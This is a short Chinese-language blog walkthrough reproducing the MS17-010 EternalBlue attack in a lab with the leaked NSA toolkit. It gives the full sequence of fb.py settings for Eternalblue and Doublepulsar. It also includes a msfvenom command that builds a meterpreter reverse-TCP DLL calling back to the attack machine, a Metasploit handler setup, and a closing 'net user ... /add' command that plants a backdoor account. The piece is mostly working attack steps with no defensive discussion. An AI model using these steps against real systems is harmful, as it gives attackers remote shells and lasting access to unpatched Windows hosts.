NSA工具包MS17-010手动复现
所需工具
目标机器: 192.168.100.123 Windows Server 2008 R2
攻击机1: 192.168.8.117 Windows Server 2012
攻击机2:192.168.8.119 Kali Linux
第一步
安装好python2.6.1以及pywin32
使用cmd进入~\NSA\windows目录
输入fb.py
配置输入好靶机IP以及攻击机1的IP
注意! : Use Redirection [yes] : 这里要选no
配置好project信息
输入
fb > use Eternalblue |
一路回车至
\[\*\] Mode :: Delivery mechanism |
此处选择 1
继续回车可得到结果
攻击机1闲置,开始操作攻击机2
msfvenom -p windows/x64/meterpreter/reverse\_tcp LHOST=192.168.8.119 LPORT=5555 -f dll > /opt/win.dll |
即在攻击机2 /opt目录下得到恶意dll–> win.dll
将win.dll转移到攻击机1上
接下来进入 msfconsole
use exploit/multi/handler |
出现
[*] Started reverse TCP handler on 192.168.8.119:5555 |
进入下一步
在攻击机1上输入
use Doublepulsar |
回车至出现
Function :: Operation for backdoor to perform |
选择2 Run DLL
并输入dll在攻击机1上的位置
回车至
[+] Doublepulsar Succeeded |
此时在攻击机2上已获得SHELL
攻击完成!
后续提权操作:
net user username password /add //添加用户 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Jindom's Blog!